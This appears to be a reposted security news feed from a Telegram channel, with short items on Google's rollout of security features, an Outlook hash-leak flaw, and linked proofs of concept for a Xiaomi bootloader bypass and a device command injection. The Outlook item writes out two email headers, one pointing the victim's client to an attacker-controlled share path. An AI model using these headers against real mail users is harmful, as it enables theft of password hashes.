January 23, 2024 at 08:24AM

■■■□□ How Google’s security engineering team handles rollouts at scale, so we can safely enforce Strict CSP, Trusted Types and other security features on 100s of new services yearly. https://bughunters.google.com/blog/5896512897417216/a-recipe-for-scaling-security https://t.me/cKure/13421

January 22, 2024 at 02:28PM

■■■■■ New Outlook Flaw Let Attackers Access Hashed Passwords. The headers that can be used for exploitation are:
● “Content-Class” = “Sharing” — tells Outlook that this email contains sharing content.
● “x-sharing-config-url” = \\(Attacker machine)\a.ics — points the victim’s Outlook to the attacker’s machine.
https://t.me/cKure/13418

January 17, 2024 at 02:33PM

■■■■■ A PoC that exploits a vulnerability to bypass the Xiaomi HyperOS community restrictions of BootLoader unlocked account bindings. https://github.com/MlgmXyysd/Xiaomi-HyperOS-BootLoader-Bypass#xiaomi-hyperos-bootloader-bypass https://t.me/cKure/13414

January 13, 2024 at 12:07PM

■■■■■ PoC Script for CVE-2022-36553: Exploits an unauthenticated remote command injection vulnerability in Hytec Inter HWL-2511-SS device. https://github.com/0xNslabs/CVE-2022-36553-PoC https://t.me/cKure/13412